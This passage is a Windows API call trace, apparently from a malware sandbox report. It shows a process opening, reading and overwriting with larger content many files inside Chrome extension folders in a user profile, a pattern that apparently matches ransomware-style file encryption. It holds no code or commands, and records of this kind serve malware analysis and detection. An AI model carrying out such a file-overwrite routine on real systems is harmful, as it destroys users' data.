| out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0164.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x1f88c44, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="verified_contents.json", lpUsedDefaultChar=0x0) returned 22 [0164.997] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.999] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1b56 [0164.999] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.000] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1b56 [0165.000] WriteFile (in: hFile=0x20c, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0165.001] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0165.002] WriteFile (in: hFile=0x20c, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0165.002] CloseHandle (hObject=0x20c) returned 1 [0165.002] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0165.003] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0165.003] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xcf [0165.003] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0165.003] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.003] ReleaseMutex (hMutex=0x168) returned 1 [0165.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.004] ReadFile (in: hFile=0x20c, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xcf, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x2d5f2bc*=0xcf, lpOverlapped=0x0) returned 1 [0165.005] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0165.005] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x657, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x657, lpOverlapped=0x0) returned 1 [0165.006] CloseHandle (hObject=0x20c) returned 1 [0165.006] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0165.007] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0165.007] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xce [0165.007] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0165.008] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.008] ReleaseMutex (hMutex=0x168) returned 1 [0165.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.008] ReadFile (in: hFile=0x20c, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xce, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x2d5f2bc*=0xce, lpOverlapped=0x0) returned 1 [0165.009] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0165.009] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x656, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x656, lpOverlapped=0x0) returned 1 [0165.010] CloseHandle (hObject=0x20c) returned 1 [0165.010] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0165.011] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0165.011] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xd1 [0165.011] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0165.012] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.012] ReleaseMutex (hMutex=0x168) returned 1 [0165.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.012] ReadFile (in: hFile=0x20c, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xd1, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x2d5f2bc*=0xd1, lpOverlapped=0x0) returned 1 [0165.013] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0165.013] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x659, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x659, lpOverlapped=0x0) returned 1 [0165.014] CloseHandle (hObject=0x20c) returned 1 [0165.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0165.988] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0165.988] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xc3 [0165.989] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0165.989] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.989] ReleaseMutex (hMutex=0x168) returned 1 [0165.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.989] ReadFile (in: hFile=0x20c, lpBuffer=0x1ee0d28, nNumberOfBytesToRead=0xc3, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0d28*, lpNumberOfBytesRead=0x2d5f2bc*=0xc3, lpOverlapped=0x0) returned 1 [0165.990] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0165.991] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x64b, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x64b, lpOverlapped=0x0) returned 1 [0165.991] CloseHandle (hObject=0x20c) returned 1 [0165.991] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0165.993] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0165.993] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xf8 [0165.993] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0165.993] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.993] ReleaseMutex (hMutex=0x168) returned 1 [0165.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.994] ReadFile (in: hFile=0x20c, lpBuffer=0x1eeb1f8, nNumberOfBytesToRead=0xf8, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb1f8*, lpNumberOfBytesRead=0x2d5f2bc*=0xf8, lpOverlapped=0x0) returned 1 [0165.995] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0165.995] WriteFile (in: hFile=0x20c, lpBuffer=0x2663f68*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663f68*, lpNumberOfBytesWritten=0x2d5f2d0*=0x680, lpOverlapped=0x0) returned 1 [0165.995] CloseHandle (hObject=0x20c) returned 1 [0165.996] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0165.996] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0165.997] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x160 [0165.997] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0165.997] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.997] ReleaseMutex (hMutex=0x168) returned 1 [0165.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computed_hashes.json", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0165.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computed_hashes.json", cchWideChar=20, lpMultiByteStr=0x1f88d34, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="computed_hashes.json", lpUsedDefaultChar=0x0) returned 20 [0165.998] ReadFile (in: hFile=0x20c, lpBuffer=0x26a9268, nNumberOfBytesToRead=0x160, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a9268*, lpNumberOfBytesRead=0x2d5f2bc*=0x160, lpOverlapped=0x0) returned 1 [0165.999] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0165.999] WriteFile (in: hFile=0x20c, lpBuffer=0x2663f68*, nNumberOfBytesToWrite=0x6e8, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663f68*, lpNumberOfBytesWritten=0x2d5f2d0*=0x6e8, lpOverlapped=0x0) returned 1 [0165.999] CloseHandle (hObject=0x20c) returned 1 [0166.000] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.001] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.001] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xf3 [0166.001] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.001] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.001] ReleaseMutex (hMutex=0x168) returned 1 [0166.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.001] ReadFile (in: hFile=0x20c, lpBuffer=0x2697308, nNumberOfBytesToRead=0xf3, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697308*, lpNumberOfBytesRead=0x2d5f2bc*=0xf3, lpOverlapped=0x0) returned 1 [0166.003] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0166.003] WriteFile (in: hFile=0x20c, lpBuffer=0x2663f68*, nNumberOfBytesToWrite=0x67b, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663f68*, lpNumberOfBytesWritten=0x2d5f2d0*=0x67b, lpOverlapped=0x0) returned 1 [0166.003] CloseHandle (hObject=0x20c) returned 1 [0166.003] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.004] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.004] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xf3 [0166.005] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.005] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.005] ReleaseMutex (hMutex=0x168) returned 1 [0166.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.005] ReadFile (in: hFile=0x20c, lpBuffer=0x2697308, nNumberOfBytesToRead=0xf3, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697308*, lpNumberOfBytesRead=0x2d5f2bc*=0xf3, lpOverlapped=0x0) returned 1 [0166.006] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0166.007] WriteFile (in: hFile=0x20c, lpBuffer=0x2663f68*, nNumberOfBytesToWrite=0x67b, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663f68*, lpNumberOfBytesWritten=0x2d5f2d0*=0x67b, lpOverlapped=0x0) returned 1 [0166.007] CloseHandle (hObject=0x20c) returned 1 [0166.007] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.008] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.008] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x105 [0166.008] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.009] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.009] ReleaseMutex (hMutex=0x168) returned 1 [0166.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.009] ReadFile (in: hFile=0x20c, lpBuffer=0x1ef2138, nNumberOfBytesToRead=0x105, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2138*, lpNumberOfBytesRead=0x2d5f2bc*=0x105, lpOverlapped=0x0) returned 1 [0166.010] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0166.010] WriteFile (in: hFile=0x20c, lpBuffer=0x2663f68*, nNumberOfBytesToWrite=0x68d, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663f68*, lpNumberOfBytesWritten=0x2d5f2d0*=0x68d, lpOverlapped=0x0) returned 1 [0166.011] CloseHandle (hObject=0x20c) returned 1 [0166.011] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 